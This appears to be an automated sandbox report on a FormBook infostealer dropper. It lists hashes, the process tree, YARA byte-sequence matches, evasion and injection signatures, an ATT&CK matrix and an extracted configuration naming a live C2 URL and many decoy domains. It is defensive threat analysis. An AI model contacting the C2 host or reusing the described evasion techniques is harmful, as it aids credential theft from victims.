Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.17207

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.17207 (renamed file extension from 17207 to exe)
Analysis ID:	626424
MD5:	14848f52302c15e27b26fee5fada11c1
SHA1:	04d62d915bd1a81c4b5ed35df6edb953107398c8
SHA256:	4ac982ea35522a13de30ff7ddbbec9becf2c7528a48f0aff377e3d6758a7ae7b
Tags:	exe
Infos:

Detection

FormBook

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe (PID: 5944 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" MD5: 14848F52302C15E27B26FEE5FADA11C1)

miylwnpd.exe (PID: 3908 cmdline: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl MD5: FF4C2F4D6E1FA34E8B958993C0DE134D)

miylwnpd.exe (PID: 1900 cmdline: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl MD5: FF4C2F4D6E1FA34E8B958993C0DE134D)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.beamaster.info/p0ip/"], "decoy": ["webberkerr.com", "lelezhuanshu.xyz", "weedformellc.com", "ikzoekeenbedrijfsruimte.com", "swahlove.com", "dubaidesertsafari.travel", "atozmedicalimages.com", "uniytriox.com", "clickyourcat.com", "shandun-safety.com", "pakmart.center", "roxxiesixx.com", "twistedtaqueriachicago.com", "studynursingaustralia.online", "wellnesstestinggroup.com", "justusebias.com", "yqvzs.com", "co1l7o8vy.com", "lightning.legal", "cardamagescanner.com", "megawatchinc.com", "sadebademli.com", "bcoky.com", "unleashingyou-lifecoaching.com", "epsubtitles.online", "susanpetersonrealty.com", "gdderui.com", "claris-studio.cloud", "cryptomnis.com", "1ens.domains", "localbusinessassets.com", "et9n7e4vf.com", "quoteypants.com", "bokepremaja18.biz", "xiangqinmao.com", "lilot-pland45.site", "exilings.com", "nft-id.net", "sport-outdoorpacks.com", "plnykosik.online", "cidesadelcentro.com", "stunning-black.xyz", "zoeyunker.com", "videogamesgroup.com", "autodnstest.com", "bookworms.store", "69817269.com", "one-session22-lp.com", "modelofindia.com", "kennnyshands.com", "otopenishop.net", "freegameswithoutdownload.online", "alaskanwave.net", "tjkt8.com", "abv.wiki", "protoncarsale.com", "zhipurc.com", "psicologamoderna.com", "hidinginplainsight.digital", "cuamini-trankien.xyz", "yustunning.com", "apeironpay.xyz", "allowdrops.xyz", "allyouneedstore.xyz"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.miylwnpd.exe.2cb0000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.miylwnpd.exe.2cb0000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8192:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14fe1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8baa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1425c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9922:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.miylwnpd.exe.2cb0000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
1.2.miylwnpd.exe.2cb0000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.miylwnpd.exe.2cb0000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.miylwnpd.exe.2cb0000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.beamaster.info/p0ip/"], "decoy": ["webberkerr.com", "lelezhuanshu.xyz", "weedformellc.com", "ikzoekeenbedrijfsruimte.com", "swahlove.com", "dubaidesertsafari.travel", "atozmedicalimages.com", "uniytriox.com", "clickyourcat.com", "shandun-safety.com", "pakmart.center", "roxxiesixx.com", "twistedtaqueriachicago.com", "studynursingaustralia.online", "wellnesstestinggroup.com", "justusebias.com", "yqvzs.com", "co1l7o8vy.com", "lightning.legal", "cardamagescanner.com", "megawatchinc.com", "sadebademli.com", "bcoky.com", "unleashingyou-lifecoaching.com", "epsubtitles.online", "susanpetersonrealty.com", "gdderui.com", "claris-studio.cloud", "cryptomnis.com", "1ens.domains", "localbusinessassets.com", "et9n7e4vf.com", "quoteypants.com", "bokepremaja18.biz", "xiangqinmao.com", "lilot-pland45.site", "exilings.com", "nft-id.net", "sport-outdoorpacks.com", "plnykosik.online", "cidesadelcentro.com", "stunning-black.xyz", "zoeyunker.com", "videogamesgroup.com", "autodnstest.com", "bookworms.store", "69817269.com", "one-session22-lp.com", "modelofindia.com", "kennnyshands.com", "otopenishop.net", "freegameswithoutdownload.online", "alaskanwave.net", "tjkt8.com", "abv.wiki", "protoncarsale.com", "zhipurc.com", "psicologamoderna.com", "hidinginplainsight.digital", "cuamini-trankien.xyz", "yustunning.com", "apeironpay.xyz", "allowdrops.xyz", "allyouneedstore.xyz"]}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Virustotal: Detection: 41%			Perma Link
Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Source: Yara match	File source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Virustotal: Detection: 20%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	ReversingLabs: Detection: 24%

Source: 1.2.miylwnpd.exe.2cb0000.1.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\sltck\alpfsb\pnlp\5a4eb681595f48a7816b70c325f39788\dfkzie\sffldbix\Release\sffldbix.pdb source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe, 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmp, miylwnpd.exe, 00000001.00000000.230322990.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, miylwnpd.exe, 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, miylwnpd.exe, 00000002.00000000.232221642.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, nsaF211.tmp.0.dr, miylwnpd.exe.0.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D7A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Code function: 0_2_004069A4 FindFirstFileW,FindClose,	0_2_004069A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.beamaster.info/p0ip/

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Code function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040580F

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403646

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002E1890	1_2_002E1890
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002E9C12	1_2_002E9C12
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002E96A0	1_2_002E96A0
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002E7E88	1_2_002E7E88
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002EC3BD	1_2_002EC3BD
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002EA184	1_2_002EA184
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002EB3F1	1_2_002EB3F1

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Virustotal: Detection: 41%
Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Jump to behavior

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Process created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Process created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Process created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Process created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

0_2_00403646

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Command line argument: ^F.

1_2_002E45B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

File created: C:\Users\user\AppData\Local\Temp\nsaF210.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.troj.winEXE@5/4@0/0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Code function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404ABB

Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Code function: 1_2_002E2445 push ecx; ret

1_2_002E2458

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

File created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Code function: 1_2_002E1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_002E1890

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_1-6461

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D7A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Code function: 0_2_004069A4 FindFirstFileW,FindClose,	0_2_004069A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	API call chain: ExitProcess graph end node			graph_0-3509
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	API call chain: ExitProcess graph end node			graph_1-6463

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Code function: 1_2_002E7A95 IsDebuggerPresent,

1_2_002E7A95

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Code function: 1_2_002E558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_002E558A

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Code function: 1_2_002E86ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

1_2_002E86ED

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002E439B SetUnhandledExceptionFilter,		1_2_002E439B
Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe	Code function: 1_2_002E43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_002E43CC

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Process created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Code function: 1_2_002E3283 cpuid

1_2_002E3283

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe

0_2_00403646

Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Code function: 1_2_002E3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_002E3EC8

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	1 Access Token Manipulation	1 Access Token Manipulation	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	11 Process Injection	LSASS Memory	13 Security Software Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	14 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
